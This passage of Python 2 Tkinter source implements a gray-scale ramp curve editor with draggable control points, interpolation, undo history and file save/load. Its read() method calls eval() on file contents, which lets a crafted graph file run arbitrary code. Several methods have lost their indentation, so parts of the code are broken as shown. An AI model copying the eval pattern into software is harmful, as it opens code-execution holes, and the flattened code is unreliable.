        self.optionType = IntVar()
        self.updatebutton = Tkinter.Menubutton(self.menuFrame1, text='Update')
        self.updatebutton.pack(side='left', anchor='w')
        self.updatemenu = Tkinter.Menu(self.updatebutton,{} )
        for v,s in {0:'Continuous',1:'MouseButtonUp',2:'Update'}.items():
            self.updatemenu.add_radiobutton(label=s,
                                            var=self.optionType,
                                            value = v,command=self.calloption)
        if continuous==1:
            self.optionType.set(0)
        self.updatebutton['menu'] = self.updatemenu
        #Curve Type
        # --- Curve menu: smooth spline vs freehand polyline (see curveoption) ---
        self.CurveType = IntVar()
        self.CurveType.set(0)
        self.Smooth=1
        self.curvebutton = Tkinter.Menubutton(self.menuFrame1, text='Curve')
        self.curvebutton.pack(side='left', anchor='w')
        self.curvemenu = Tkinter.Menu(self.curvebutton,{} )
        for v,s in {0:'Smooth',1:'Freehand'}.items():
            self.curvemenu.add_radiobutton(label=s,
                                           var=self.CurveType,
                                           value = v,command=self.curveoption)
        self.curvebutton['menu'] = self.curvemenu
        # --- bottom frame: sensitivity thumbwheel + Update/Dismiss buttons ---
        f1 = Tkinter.Frame(self.master)
        f1.pack(side='bottom', fill='both', expand=1)
        self.d1scalewheellab=Label(f1,text="Sensitivity")
        self.d1scalewheellab.pack(side="left")
        self.d1scalewheel=ThumbWheel(width=100, height=26,wheelPad=4,master=f1,labcfg={'fg':'black', 'side':'left', 'text':'Test:'},wheelLabcfg1={'font':(ensureFontCase('times'),14,'bold')},wheelLabcfg2={'font':(ensureFontCase('times'),14,'bold')},canvascfg={'bg':'blue'},min = 0.0,max = 1.0,precision =4,showlabel =0,value =0.013,continuous =0,oneTurn =0.01,size = 200)
        self.d1scalewheel.pack(side="left")
        #tooltip
        self.balloon = Pmw.Balloon(f1)
        self.balloon.bind(self.d1scalewheel,"cutoff value for differences in Z xoordinates,small values generate more contours")
        self.Updatebutton=Button(f1,text='  Update  ',command=self.Update)
        self.Updatebutton.pack(side=LEFT)
        self.Quitbutton=Button(f1,text='  Dismiss  ',command=self.dismiss_cb)
        self.Quitbutton.pack(side=RIGHT)
        # Mouse bindings drive the whole curve-editing interaction.
        self.canvas.bind("<Button-1>", self.OnCanvasClicked)
        self.canvas.bind("<B1-Motion>", self.OnCanvasMouseDrag)
        self.canvas.bind("<ButtonRelease-1>", self.OnCanvasMouseUp)
        self.canvas.config(closeenough=2.0)
        self.canvas.pack(side=BOTTOM, fill=BOTH,expand=1)
        # Plot area in canvas coordinates: x in [50, 305], y in [20, 275]
        # (canvas y grows downward, so startpoint is the lower-left corner).
        self.startpoint=(px,py)=(50,275)
        self.endpoint=(px1,py1)=(305,20)
        self.newpoints=[(px,py),(px1,py1)]
        self.canvas.create_rectangle([(px-1,py),(px1+1,py1)],fill='white',outline="black",width=1)
        self.canvas.create_text(46,281,text=0,anchor=N)
        #Drawing Graph Sheet
        # Tick marks and labels every 50 units along both axes, plus a
        # light-gray grid inside the plot area.
        for i in range(1,6):
            x=50+i*50
            canvas.create_line(x,280,x,275,width=1)
            canvas.create_text(x,281,text='%d' %(50*i),anchor=N)
        for i in range(1,5):
            x=50+i*50
            canvas.create_line(x,275,x,20,width=1,fill="gray80")
        for i in range(1,6):
            y=275-i*50
            canvas.create_line(45,y,50,y,width=1)
            canvas.create_text(44,y,text='%d' %(50*i),anchor=E)
        for i in range(1,5):
            y=275-i*50
            canvas.create_line(50,y,305,y,width=1,fill="gray80")
        (x,y)=self.newpoints[0]
        (x1,y1)=self.newpoints[-1]
        # Initial curve: straight line from startpoint to endpoint.
        self.curline=canvas.create_line(self.newpoints,fill='black',width=1)
        #GRAY SCALE
        # 100 gray swatches rendered as thin rectangles along the bottom
        # (horizontal ramp) and the left side (vertical ramp).
        grays=[]
        for i in range(0,100,1):
            grays.append("gray"+"%d" %i)
        #grays.reverse()
        #bottom one
        x1=48
        x2=51
        self.canvas.create_rectangle([(50,315),(307,300)],fill='white',outline="black",width=0.5)
        for a in grays:
            if x1>306:
                x1=x2=306
            self.canvas.create_rectangle([(x1+2.5,314),(x2+2.5,301)],fill=a,outline=a,width=1)
            x1=x1+2.5
            x2=x2+2.5
        #left one
        y1=274
        y2=271
        self.canvas.create_rectangle([(20,275),(5,20)],fill='black',outline="black",width=0.5)
        for a in grays:
            if y1>275:
                y1=y2=275
            self.canvas.create_rectangle([(19,y1-2.5),(6,y2-2.5)],fill=a,outline=a,width=1)
            y1=y1-2.5
            y2=y2-2.5
        # Editing state: committed control points and their canvas ovals.
        self.oldpoints=[]
        self.canvas.configure(cursor='cross')
        self.curovals=[]
        self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
        # now set the constructor options correctly using the configure method
        apply( self.configure, (),{'callback':callback,'continuous':continuous})
        # Update-mode flags (exactly one is active; see calloption).
        self.continuous=continuous
        self.mousebuttonup=0
        self.update=0
        self.range_points=[]
        self.history=[]
        self.bars=[]
        self.default_ramp=[]
        self.histvalues=[]
def calloption(self):
tag=self.optionType.get()
self.continuous=0
self.mousebuttonup=0
self.update=0
if tag==0:
self.continuous=1
elif tag==1:
self.mousebuttonup=1
elif tag==2:
self.update=1
def curveoption(self):
tag=self.CurveType.get()
self.Smooth=0
self.Freehand=0
if tag==0:
self.Smooth=1
self.canvas.delete(self.curline)
self.curline=self.canvas.create_line(self.getControlPoints(),smooth=1)
elif tag==1:
self.Freehand=1
self.canvas.delete(self.curline)
self.curline=self.canvas.create_line(self.getControlPoints())
    def OnCanvasClicked(self,event):
        """Handle a left-button press on the canvas.

        Commits the last dragged point to the control-point list (if it was
        not committed on mouse-up), records the click origin, and computes
        limit_xcoord — the neighbouring control points that the clicked
        point must not cross while dragging.
        """
        self.CLICK_NODRAG=1
        # Keep the last history entry in sync with the sensitivity wheel.
        if self.history!=[]:
            if self.history[-1][1]!=self.d1scalewheel.get():
                self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
        # Commit the previous drag point if it is not already stored.
        if hasattr(self,"curx"):
            if (self.curx,self.cury) :#not in [self.startpoint,self.endpoint]:
                (self.ox,self.oy)=(self.curx,self.cury)
                if (self.ox,self.oy) not in self.oldpoints:
                    self.oldpoints.append((self.ox,self.oy))
                    if hasattr(self,"curoval"):
                        self.curovals.append(self.curoval)
        self.OrgX=event.x
        self.OrgY=event.y
        CtlPoints=[]
        xcoords=[]
        ycoords=[]
        #Limiting points not to cross
        self.limit_xcoord=[]
        # Build a ~10-pixel square of candidate hit positions around the click.
        for i in range(0,10):
            xcoords.append(self.OrgX-i)
            ycoords.append(self.OrgY-i)
            xcoords.append(self.OrgX+i)
            ycoords.append(self.OrgY+i)
        if xcoords!=[] and ycoords!=[]:
            for x in xcoords:
                for y in ycoords:
                    CtlPoints.append((x,y))
        # NOTE(review): range_points aliases (not copies) oldpoints, so this
        # sort also reorders self.oldpoints in place.
        self.range_points=self.oldpoints
        self.range_points.sort()
        # If the click hit an existing control point, remember its two
        # neighbours (or the curve endpoints) as drag limits and return.
        for c in CtlPoints:
            if c in self.range_points:
                index_c=self.range_points.index(c)
                if index_c<len(self.range_points)-1:
                    self.limit_xcoord.append(self.range_points[index_c+1])
                    if index_c>0:
                        self.limit_xcoord.append(self.range_points[index_c-1])
                        return
                    else:
                        self.limit_xcoord.append(self.startpoint)
                        return
                elif index_c==len(self.range_points)-1:
                    self.limit_xcoord.append(self.range_points[index_c-1])
                    self.limit_xcoord.append(self.endpoint)
                    return
        self.newd1ramp= self.caluculate_ramp()
    def OnCanvasMouseUp(self,event):
        """Handle left-button release.

        Commits the dragged point and its oval; if the press was a plain
        click (no drag), deletes the control point under the cursor and
        redraws.  Fires callbacks when in MouseButtonUp mode and appends a
        snapshot to the undo history.
        """
        CtlPoints=[]
        xcoords=[]
        ycoords=[]
        # Commit the point that was being dragged.
        if hasattr(self,"curx"):
            (self.ox,self.oy)=(self.curx,self.cury)
            if (self.ox,self.oy) not in self.oldpoints :#not in [self.startpoint,self.endpoint] :
                self.oldpoints.append((self.ox,self.oy))
            if hasattr(self,"curoval"):
                if self.curoval not in self.curovals:
                    self.curovals.append(self.curoval)
        if self.CLICK_NODRAG==1:
            #finding out points around the selected point
            for i in range(0,10):
                xcoords.append(self.OrgX-i)
                ycoords.append(self.OrgY-i)
                xcoords.append(self.OrgX+i)
                ycoords.append(self.OrgY+i)
            if xcoords!=[] and ycoords!=[]:
                for x in xcoords:
                    for y in ycoords:
                        CtlPoints.append((x,y))
            # Click on an existing control point: remove it and its oval.
            for c in CtlPoints:
                if c in self.oldpoints:
                    ind=self.oldpoints.index(c)
                    op=self.oldpoints[ind]
                    if ind>0:
                        prev_oldpoint=self.oldpoints[ind-1]
                    else:
                        prev_oldpoint=self.endpoint
                    del self.oldpoints[ind]
                    # Ovals are matched by canvas coords (top-left + 2 = center).
                    # NOTE(review): removing from curovals while iterating it
                    # can skip the following oval — confirm intended.
                    for co in self.curovals:
                        ov_point1=self.canvas.coords(co)
                        if len(ov_point1)!=0:
                            ov_point=(int(ov_point1[0]+2),int(ov_point1[1]+2))
                            if ov_point==c and ov_point not in [self.startpoint,self.endpoint]:
                                self.canvas.delete(co)
                                self.curovals.remove(co)
                                if hasattr(self,"curx"):
                                    if ov_point==(self.curx,self.cury):
                                        (self.curx,self.cury)=prev_oldpoint
                    self.draw()
        # MouseButtonUp mode: recompute the ramp and notify listeners now.
        if self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            self.callbacks.CallCallbacks(self.newd1ramp)
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
    def OnCanvasMouseDrag(self,event):
        """Handle left-button drag motion.

        If the drag started on an existing control point, removes that
        point and its oval (the dragged position will re-create them),
        then records the current cursor position and redraws the curve.
        """
        self.CLICK_NODRAG=0
        CtlPoints=[]
        xcoords=[]
        ycoords=[]
        #making active clickrange to be ten points around clicked point
        for i in range(0,10):
            xcoords.append(self.OrgX-i)
            ycoords.append(self.OrgY-i)
            xcoords.append(self.OrgX+i)
            ycoords.append(self.OrgY+i)
        if xcoords!=[] and ycoords!=[]:
            for x in xcoords:
                for y in ycoords:
                    CtlPoints.append((x,y))
        # Remove the grabbed control point and its oval marker.
        for c in CtlPoints:
            if c in self.oldpoints:
                ind=self.oldpoints.index(c)
                op=self.oldpoints[ind]
                del self.oldpoints[ind]
                for co in self.curovals:
                    ov_point1=self.canvas.coords(co)
                    if len(ov_point1)!=0:
                        ov_point=(int(round(ov_point1[0],3))+2,int(round(ov_point1[1],3))+2)
                        if ov_point==c :
                            self.canvas.delete(co)
                            self.curovals.remove(co)
        # Track the cursor and redraw with the point following the mouse.
        self.curx=dx=event.x
        self.cury=dy=event.y
        self.draw()
    def draw(self):
        """Redraw the curve and its control-point ovals.

        Clamps the dragged point inside the plot area and between its
        neighbouring control points, rebuilds the ordered point list,
        deletes/re-creates the canvas line and ovals, recomputes the ramp
        and (in continuous mode) fires the callbacks.
        """
        new1points=[]
        curve_points=[]
        self.smoothened_points=[]
        # On a plain click (no drag) fall back to the curve endpoint.
        if self.CLICK_NODRAG==0:
            dx=self.curx
            dy=self.cury
        else:
            (dx,dy)=(self.curx,self.cury)=(self.endpoint)
        ###Limiting xcoords of the current point not to cross adjacent points
        if hasattr(self,"limit_xcoord"):
            if self.limit_xcoord!=[]:
                self.limit_xcoord.sort()
                if (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
                    if (self.curx,self.cury)< self.limit_xcoord[0]:
                        if self.curx<=self.limit_xcoord[0][0] and self.cury<self.limit_xcoord[0][1]:
                            dx=self.curx=self.limit_xcoord[0][0]+1
                        if self.curx<=self.limit_xcoord[0][0] and self.cury>self.limit_xcoord[0][1]:
                            dx=self.curx=self.limit_xcoord[0][0]
                    if (self.curx,self.cury)> self.limit_xcoord[1]:
                        if self.curx>=self.limit_xcoord[1][0] and self.cury>self.limit_xcoord[1][1]:
                            dx=self.curx=self.limit_xcoord[1][0]-1
                        if self.curx>=self.limit_xcoord[1][0] and self.cury<self.limit_xcoord[1][1]:
                            dx=self.curx=self.limit_xcoord[1][0]
        #Limit graph with in the axis
        # Clamp to the plot area: x in [50, 305], y in [20, 275].
        if self.curx not in range(50,305):
            if self.curx<50:
                self.curx=dx=50
            else:
                self.curx=dx=305
        if self.cury not in range(20,275):
            if self.cury<20:
                self.cury=dy=20
            else:
                self.cury=dy=275
        #adding start,end points
        new1points.append(self.startpoint)
        new1points.append(self.endpoint)
        #adding current point to list
        if (dx,dy) not in new1points and (dx,dy) not in [self.startpoint,self.endpoint]:
            new1points.append((dx,dy))
        #adding oldpoints to list
        if hasattr(self,"ox"):
            for op in self.oldpoints:
                if op not in new1points:
                    new1points.append(op)
        new1points.sort()
        #removing oval point that is on drag
        if hasattr(self,"curoval"):
            if self.curoval not in self.curovals:
                self.canvas.delete(self.curoval)
        self.canvas.delete(self.curline)
        #if points that start with 50 or 51 or 305,304 other than start ,end
        #points exists remove start or end points
        #remove ovals
        #finding oval for start point and endpoint
        # A user point at x~50 (or x~305) supersedes the default start
        # (end) point: drop the default point and delete its oval.
        for i in new1points:
            if i[0]==51 or i[0]==50:
                if i!=self.startpoint:
                    if self.startpoint in new1points:
                        new1points.remove(self.startpoint)
                        ###removing start point oval
                        x = 50
                        y = 275
                        st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
                        if st_oval_1:
                            for so in st_oval_1:
                                if so!=[]:
                                    st_oval=so
                                    st_oval_coords=self.canvas.coords(st_oval)
                                    if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
                                        self.canvas.delete(st_oval)
                                        if st_oval in self.curovals:
                                            self.curovals.remove(st_oval)
        for i in new1points:
            if i[0]==304 or i[0]==305:
                if i!=self.endpoint :
                    if self.endpoint in new1points:
                        new1points.remove(self.endpoint)
                        ###removing end point oval
                        x = 305
                        y = 20
                        end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
                        if end_oval_1:
                            for eo in end_oval_1:
                                if eo!=[]:
                                    end_oval=eo
                                    end_oval_coords=self.canvas.coords(end_oval)
                                    if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
                                        self.canvas.delete(end_oval)
                                        if end_oval in self.curovals:
                                            self.curovals.remove(end_oval)
        new1points.sort()
        # Flatten (x, y) pairs into the x0,y0,x1,y1,... form Tk expects.
        for (x,y) in new1points:
            curve_points.append(x)
            curve_points.append(y)
        self.smoothened_points= self.smooth(curve_points)
        #drawing line
        if len(self.smoothened_points)>2:
            if self.Smooth:
                self.curline=self.canvas.create_line(self.smoothened_points)
            else:
                self.curline=self.canvas.create_line(curve_points)
        else:
            # NOTE(review): 'curve_points[0]==50 or 51' is always truthy
            # (the literal 51 is not compared), so the else branch below is
            # unreachable — likely meant 'in (50, 51)'.
            if curve_points[0]==50 or 51:
                if self.Smooth:
                    self.curline=self.canvas.create_line(curve_points,smooth=1)
                else:
                    self.curline=self.canvas.create_line(curve_points)
            else:
                self.curline=self.canvas.create_line(self.startpoint,self.endpoint)
        ##Adding oval when start or end point in new1points
        coval_coords=[]
        for i in self.curovals:
            coval_coords.append(self.canvas.coords(i))
        if self.endpoint in new1points:
            co=self.canvas.create_oval(self.endpoint[0]-2,self.endpoint[-1]-2,self.endpoint[0]+2,self.endpoint[-1]+2,width=1,outline='black',fill='black')
            endco_coords =self.canvas.coords(co)
            if endco_coords not in coval_coords:
                self.curovals.append(co)
        if self.startpoint in new1points:
            co=self.canvas.create_oval(self.startpoint[0]-2,self.startpoint[-1]-2,self.startpoint[0]+2,self.startpoint[-1]+2,width=1,outline='black',fill='black')
            startco_coords=self.canvas.coords(co)
            if startco_coords not in coval_coords:
                self.curovals.append(co)
        #drawing ovals
        if (self.curx,self.cury)!=self.endpoint:
            self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
        if (self.curx,self.cury)==self.endpoint and self.endpoint in new1points:
            self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
        # Recompute the ramp; in continuous mode notify listeners per drag step.
        self.newd1ramp= self.caluculate_ramp()
        if self.continuous:
            self.callbacks.CallCallbacks(self.newd1ramp)
    ######## convert coordinates to ramp##################
    def caluculate_ramp(self):
        """Rasterize the control-point polyline into a gray ramp.

        Collects the current drag point, committed points and the two
        curve endpoints, sorts them by x, then walks each consecutive pair
        producing one interpolated sample per x step.  Each sample's
        canvas y is mapped to a value 275 - y (clipped to 255).  Returns a
        float32 Numeric array; falls back to the identity ramp 0..255 if
        no samples were produced.
        """
        dramp=[]
        mypoints=[]
        mynewpoints=[]
        self.oldpoints.sort()
        calcpoints=[]
        #if self.continuous :
        # Include the point currently being dragged, if any.
        if hasattr(self,"curx"):
            if (self.curx,self.cury) not in self.oldpoints and (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
                calcpoints.append((self.curx,self.cury))
        if len(self.oldpoints)!=0:
            for o in self.oldpoints:
                if o not in calcpoints:
                    calcpoints.append(o)
        if self.startpoint not in calcpoints:
            calcpoints.append(self.startpoint)
        if self.endpoint not in calcpoints:
            calcpoints.append(self.endpoint)
        calcpoints.sort()
        length=len(calcpoints)
        # Linear interpolation between each consecutive pair of points,
        # stepping one pixel in x at a time.
        for l in range(length):
            if l+1<=length-1:
                mypoints=[calcpoints[l],calcpoints[l+1]]
                if calcpoints[l] not in mynewpoints:
                    mynewpoints.append( calcpoints[l])
                (x1,y1)=calcpoints[l]
                (x2,y2)=calcpoints[l+1]
                if x1>x2:
                    dcx=x1-x2
                    px=x1-1
                else:
                    dcx=x2-x1
                    px=x1+1
                if y1>y2:
                    dcy=y1-y2
                    if dcx>=1:
                        py=y1-float(dcy)/float(dcx)
                    else:
                        py=y1
                else:
                    dcy=y2-y1
                    if dcx>=1:
                        py=y1+float(dcy)/float(dcx)
                    else:
                        py=y2
                mynewpoints.append( (px,int(round(py))))
                for dc in range(dcx-1):
                    if x1>x2:
                        px=px-1
                    else:
                        px=px+1
                    if y1>y2:
                        if dcx>=1:
                            py=py-float(dcy)/float(dcx)
                        else:
                            py=y1
                    else:
                        if dcx>=1:
                            py=py+float(dcy)/float(dcx)
                        else:
                            py=y2
                    mynewpoints.append( (px,int(round(py))))
        ramp=[]
        for r in mynewpoints:
            #scale
            # Canvas y=275 is the axis origin, so 275 - y is the ramp value.
            ra=float(275-r[1])
            if ra>=256:
                ra=255.0
            ramp.append(ra)
        dramp=Numeric.array(ramp,'f')
        if len(dramp)!=0:
            return dramp
        else:
            # No points yet: return the identity ramp.
            dramp=Numeric.arange(0,256,1,'f')
            return dramp
def get(self):
if hasattr(self,"newd1ramp"):
return self.newd1ramp
else:
return self.caluculate_ramp()
def configure(self, **kw):
if 'type' in kw.keys(): # make sure type is set first
self.setType(kw['type'])
del kw['type']
for key,value in kw.items():
if key=='callback':
self.setCallbacks(value)
def setCallbacks(self, cb):
"""Set widget callback. Must be callable function. Callback is called
every time the widget value is set/modified"""
assert cb is None or callable(cb) or type(cb) is types.ListType,\
"Illegal callback: must be either None or callable. Got %s"%cb
if cb is None: return
elif type(cb) is types.ListType:
for func in cb:
assert callable(func), "Illegal callback must be callable. Got %s"%func
self.callbacks.AddCallback(func)
else:
self.callbacks.AddCallback(cb)
self.callback = cb
    def invertGraph(self):
        """Invert the curve vertically: each control point's y is mirrored
        about the middle of the plot area (y -> 275 - (y - 20)), then the
        curve and its ovals are rebuilt from the mirrored points."""
        # Keep the last history entry in sync with the sensitivity wheel.
        if self.history!=[]:
            if self.history[-1][1]!=self.d1scalewheel.get():
                self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
        invert_points=[]
        #self.oldpoints=[]
        points=self.getControlPoints()
        if len(points)<2:
            points=[self.startpoint,self.endpoint]
        # Mirror each in-range point about the vertical center of the axes.
        for p in points:
            if p[1] in range(20,276):
                y=275 -(p[1]-20)
                invert_points.append((p[0],y))
        self.reset()
        ###################################################
        #Some times start and end points are not deleted
        #So for deleting them canvas.find_enclosed points at
        #startpoint and endpoint are caluculated(returns alist of
        #canvas objects present there) and if the coords of
        #any canvas objects matches with start or end point that gets deleted
        #####################################################
        x = 50
        y = 275
        st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
        if st_oval_1:
            for so in st_oval_1:
                if so!=[]:
                    st_oval=so
                    st_oval_coords=self.canvas.coords(st_oval)
                    if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
                        self.canvas.delete(st_oval)
                        if st_oval in self.curovals:
                            self.curovals.remove(st_oval)
        x = 305
        y = 20
        end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
        if end_oval_1:
            for eo in end_oval_1:
                if eo!=[]:
                    end_oval=eo
                    end_oval_coords=self.canvas.coords(end_oval)
                    if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
                        self.canvas.delete(end_oval)
                        if end_oval in self.curovals:
                            self.curovals.remove(end_oval)
        # Rebuild the curve and one oval marker per mirrored point.
        self.canvas.delete(self.curline)
        if self.Smooth:
            self.curline=self.canvas.create_line(invert_points,smooth=1)
        else:
            self.curline=self.canvas.create_line(invert_points)
        self.oldpoints=invert_points
        for p in invert_points:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        (self.curx,self.cury) =invert_points[-2]
        if self.continuous or self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            # NOTE(review): the ramp is wrapped in a list here, unlike the
            # other CallCallbacks call sites — confirm listeners expect this.
            self.callbacks.CallCallbacks([self.newd1ramp])
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
    def defaultcurve_cb(self):
        """Restore the built-in default curve: reset sensitivity to 0.013,
        replace the control points with the default set, and redraw the
        curve and its oval markers."""
        # Keep the last history entry in sync with the sensitivity wheel.
        if self.history!=[]:
            if self.history[-1][1]!=self.d1scalewheel.get():
                self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
        points=[]
        self.default_points=[]
        self.oldpoints=[]
        self.d1scalewheel.set(0.013)
        self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
        self.reset()
        self.canvas.delete(self.curline)
        self.default_points.sort()
        if self.Smooth:
            self.curline=self.canvas.create_line(self.default_points,smooth=1)
        else:
            self.curline=self.canvas.create_line(self.default_points)
        self.oldpoints=self.default_points
        for p in self.default_points:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        (self.curx,self.cury) =self.default_points[-2]
        if self.continuous or self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            self.callbacks.CallCallbacks(self.newd1ramp)
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
        # NOTE(review): if neither continuous nor mousebuttonup mode is
        # active and no ramp was computed earlier, newd1ramp may not exist
        # here — confirm the Update-mode invariants.
        self.default_ramp= self.newd1ramp
def read_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Read Graph"
fileName = self.fileOpenAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.read(fileName)
def read( self,fileName):
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
fptr=open(fileName,"r")
data=fptr.readlines()
cpoints=data[0][:-1]
sensitivity=data[1]
self.d1scalewheel.set(eval(sensitivity))
if len(cpoints)==0:
return
else:
points=cpoints
self.oldpoints=[]
self.reset()
if hasattr(self,"curline"):
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
self.curovals.remove(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
if self.Smooth:
self.curline=self.canvas.create_line(eval(points),smooth=1)
else:
self.curline=self.canvas.create_line(eval(points))
self.readpoints=self.oldpoints=eval(points)[1:-1]
for p in eval(points)[1:-1]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =eval(points)[-2]
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def fileOpenAsk(self, idir=None, ifile=None, types=None,
title='Open'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.askopenfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
def write_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Write Graph"
fileName = self.fileSaveAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.write(fileName)
def write(self,fileName):
fptr=open(fileName,"w")
points= self.getControlPoints()
points.sort()
fptr.write(str(points))
fptr.write("\n")
fptr.write(str(self.d1scalewheel.get()))
fptr.close()
def fileSaveAsk(self, idir=None, ifile=None, types = None,
title='Save'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.asksaveasfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
    def reset(self):
        """Delete the current curve line and every control-point oval, and
        forget the cached drag state (curoval / curx)."""
        self.canvas.delete(self.curline)
        self.oldpoints=[]
        for c in self.curovals:
            self.canvas.delete(c)
        if hasattr(self,"curoval"):
            self.canvas.delete(self.curoval)
        self.curovals=[]
        # drop the attributes that track the point being dragged so stale
        # state cannot leak into the next interaction
        if hasattr(self,"curoval"):
            delattr(self,"curoval")
        if hasattr(self,"curx"):
            delattr(self,"curx")
    def resetAll_cb(self):
        """Reset the widget to the identity curve: a straight line from
        startpoint (value 0) to endpoint (value 255), sensitivity 0.013,
        and an empty history."""
        self.reset()
        self.curline=self.canvas.create_line([self.startpoint,self.endpoint],width=1,fill='black')
        for p in [self.startpoint,self.endpoint]:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        self.oldpoints=[self.startpoint,self.endpoint]
        (self.curx,self.cury)=self.endpoint
        self.d1scalewheel.set(0.013)
        if self.continuous or self.mousebuttonup:
            # identity ramp: value i maps to i
            self.newd1ramp=Numeric.arange(0,256,1,'f')
            self.callbacks.CallCallbacks(self.newd1ramp)
        #self.histvar.set(0)
        self.history=[]
def stepBack_cb(self):
"""when stepBack button clicked previous step is displayed.History of
all the steps done is remembered and when stepback clicked from history
list previous step is shown and that step is removed from history list """
if self.history!=[]:
if len(self.history)==1:
self.resetAll_cb()
else:
del self.history[-1]
pns = self.history[-1][0]
#deleting
self.oldpoints=pns
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
###################################################
#Some times start and end points are not deleted
#So for deleting them canvas.find_enclosed points at
#startpoint and endpoint are caluculated(returns alist of
#canvas objects present there) and if the coords of
#any canvas objects matches with start or end point that gets deleted
#####################################################
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
pns.sort()
#if no start or end points
if pns[0][0]>51 :
pns.insert(0,self.startpoint)
l=len(pns)
if pns[-1][0]<304:
pns.insert(l,self.endpoint)
#if start or endpoints and points with (50or 51) or (305or305)
if self.startpoint in pns:
for p in pns:
if p!=self.startpoint:
if p[0]== 50 or p[0]==51:
pns.remove(self.startpoint)
if self.endpoint in pns:
for p in pns:
if p!=self.endpoint:
if p[0]==305 or p[0]==304:
pns.remove(self.endpoint)
print pns
if self.Smooth:
self.curline=self.canvas.create_line(pns,width=1,fill='black',smooth=1)
else:
self.curline=self.canvas.create_line(pns,width=1,fill='black')
for p in pns:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
self.d1scalewheel.set(self.history[-1][1])
if self.continuous or self.mousebuttonup:
self.newd1ramp=Numeric.arange(0,256,1,'f')
self.callbacks.CallCallbacks(self.newd1ramp)
(self.curx,self.cury)=self.endpoint
    def getControlPoints(self):
        """Return the current control points sorted by x, always including a
        point at (or adjacent to) the left and right edge of the axis.

        NOTE(review): this method mutates self.oldpoints as a side effect
        (the fixed start/end markers are removed from it).
        """
        if not self.oldpoints==[self.startpoint,self.endpoint]:
            # strip the fixed start/end markers; they are re-added below only
            # when no user point already sits on the edge columns
            for i in range(len(self.oldpoints)):
                if self.startpoint in self.oldpoints:
                    self.oldpoints.remove(self.startpoint)
                if self.endpoint in self.oldpoints:
                    self.oldpoints.remove(self.endpoint)
        self.controlpoints=[]
        # include the oval currently being dragged, if it is a real point
        if hasattr(self,"curoval"):
            c=self.canvas.coords(self.curoval)
            if len(c)!=0:
                if (int(c[0]+2),int(c[1]+2)) not in self.oldpoints and (int(c[0]+2),int(c[1]+2)) not in [self.startpoint,self.endpoint]:
                    self.controlpoints.append((int(c[0]+2),int(c[1]+2)))
